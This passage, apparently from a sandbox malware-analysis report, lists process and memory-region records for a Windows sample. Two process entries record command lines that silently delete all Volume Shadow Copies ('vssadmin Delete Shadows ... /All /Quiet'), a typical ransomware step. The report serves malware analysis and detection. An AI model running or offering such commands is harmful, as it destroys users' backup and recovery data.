	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 3057
	        start_va = 0x490000
	          end_va = 0x490fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000490000"
	        filename = ""

Region:
	              id = 3089
	        start_va = 0x4a0000
	          end_va = 0x4dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004a0000"
	        filename = ""

Region:
	              id = 3090
	        start_va = 0x4e0000
	          end_va = 0x51ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004e0000"
	        filename = ""

Region:
	              id = 3117
	        start_va = 0x540000
	          end_va = 0x57ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000540000"
	        filename = ""

Region:
	              id = 3118
	        start_va = 0x580000
	          end_va = 0x5bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000580000"
	        filename = ""

Region:
	              id = 3119
	        start_va = 0x5c0000
	          end_va = 0x5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005c0000"
	        filename = ""

Region:
	              id = 3120
	        start_va = 0x600000
	          end_va = 0x63ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000600000"
	        filename = ""

Region:
	              id = 3245
	        start_va = 0x770000
	          end_va = 0x84ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 3255
	        start_va = 0x6010000
	          end_va = 0x608ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006010000"
	        filename = ""

Region:
	              id = 3256
	        start_va = 0x520000
	          end_va = 0x528fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 102
	os_tid = 0x45c


Thread:
	id = 105
	os_tid = 0xafc


Thread:
	id = 250
	os_tid = 0xc34


Thread:
	id = 253
	os_tid = 0xc44


Thread:
	id = 255
	os_tid = 0xc50


Process:
	id = "34"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x4000f000"
	os_pid = "0xba0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "31"
	os_parent_pid = "0x13fc"
	cmd_line = "vssadmin  Delete Shadows /For=R: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 2440
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 2441
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 2442
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 2443
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 2444
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 2445
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 2446
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 2447
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 2448
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 2449
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 2450
	        start_va = 0x4880000
	          end_va = 0x4881fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 2451
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 2452
	        start_va = 0x7f250000
	          end_va = 0x7f272fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f250000"
	        filename = ""

Region:
	              id = 2453
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2454
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 2455
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 2456
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2457
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 2480
	        start_va = 0x400000
	          end_va = 0x50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 2482
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 2483
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 2487
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2488
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 2489
	        start_va = 0x4890000
	          end_va = 0x4b5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 2495
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2496
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 2503
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 2504
	        start_va = 0x7f150000
	          end_va = 0x7f24ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f150000"
	        filename = ""

Region:
	              id = 2553
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2554
	        start_va = 0x4880000
	          end_va = 0x4883fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 2555
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 2556
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 2557
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 2558
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 2559
	        start_va = 0x500000
	          end_va = 0x50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000500000"
	        filename = ""

Region:
	              id = 2560
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 2569
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 2570
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 2571
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 2572
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 2573
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 2574
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 2579
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 2580
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 2581
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 2582
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 2583
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 2584
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 2585
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 2594
	        start_va = 0x4890000
	          end_va = 0x48effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 2595
	        start_va = 0x4a60000
	          end_va = 0x4b5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a60000"
	        filename = ""

Region:
	              id = 2596
	        start_va = 0x510000
	          end_va = 0x697fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000510000"
	        filename = ""

Region:
	              id = 2597
	        start_va = 0x4890000
	          end_va = 0x48b9fff
	       monitored = 0
	     entry_point = 0x4895680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 2598
	        start_va = 0x48e0000
	          end_va = 0x48effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048e0000"
	        filename = ""

Region:
	              id = 2599
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 2600
	        start_va = 0x6a0000
	          end_va = 0x820fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000006a0000"
	        filename = ""

Region:
	              id = 2601
	        start_va = 0x4890000
	          end_va = 0x489cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 2602
	        start_va = 0x4b60000
	          end_va = 0x5f5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004b60000"
	        filename = ""

Region:
	              id = 2607
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 2608
	        start_va = 0x440000
	          end_va = 0x440fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 2609
	        start_va = 0x48a0000
	          end_va = 0x48a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048a0000"
	        filename = ""

Region:
	              id = 2610
	        start_va = 0x48f0000
	          end_va = 0x49d9fff
	       monitored = 0
	     entry_point = 0x492d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 2617
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 3289
	        start_va = 0x48b0000
	          end_va = 0x48b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048b0000"
	        filename = ""

Region:
	              id = 3290
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 3291
	        start_va = 0x48c0000
	          end_va = 0x48c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048c0000"
	        filename = ""

Region:
	              id = 3413
	        start_va = 0x450000
	          end_va = 0x48ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000450000"
	        filename = ""

Region:
	              id = 3414
	        start_va = 0x490000
	          end_va = 0x4cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000490000"
	        filename = ""

Region:
	              id = 3430
	        start_va = 0x48f0000
	          end_va = 0x492ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048f0000"
	        filename = ""

Region:
	              id = 3431
	        start_va = 0x4930000
	          end_va = 0x496ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004930000"
	        filename = ""

Region:
	              id = 3432
	        start_va = 0x4970000
	          end_va = 0x49affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004970000"
	        filename = ""

Region:
	              id = 3433
	        start_va = 0x49b0000
	          end_va = 0x49effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000049b0000"
	        filename = ""

Region:
	              id = 3542
	        start_va = 0x5f60000
	          end_va = 0x603ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 3556
	        start_va = 0x6040000
	          end_va = 0x60bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006040000"
	        filename = ""

Region:
	              id = 3557
	        start_va = 0x48d0000
	          end_va = 0x48d8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 121
	os_tid = 0xbf4


Thread:
	id = 133
	os_tid = 0xc04


Thread:
	id = 269
	os_tid = 0xcb8


Thread:
	id = 272
	os_tid = 0xa50


Thread:
	id = 273
	os_tid = 0xb8


Process:
	id = "35"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x2f38f000"
	os_pid = "0xab4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=Q: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 2458
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 2459
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 2460
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 2461
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 2462
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 2463
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 2464
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 2465
	        start_va = 0x2e0000
	          end_va = 0x2e1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000002e0000"
	        filename = ""

Region:
	              id = 2466
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 2467
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 2468
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 2469
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 2470
	        start_va = 0x7e9e0000
	          end_va = 0x7ea02fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e9e0000"
	        filename = ""

Region:
	              id = 2471
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2472
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 2473
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 2474
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2475
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 2481
	        start_va = 0x1c0000
	          end_va = 0x26ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 2484
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 2485
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 2486
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2492
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 2493
	        start_va = 0x4600000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 2494
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2500
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 2501
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 2502
	        start_va = 0x7e8e0000
	          end_va = 0x7e9dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e8e0000"
	        filename = ""

Region:
	              id = 3037
	        start_va = 0x4600000
	          end_va = 0x46bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3038
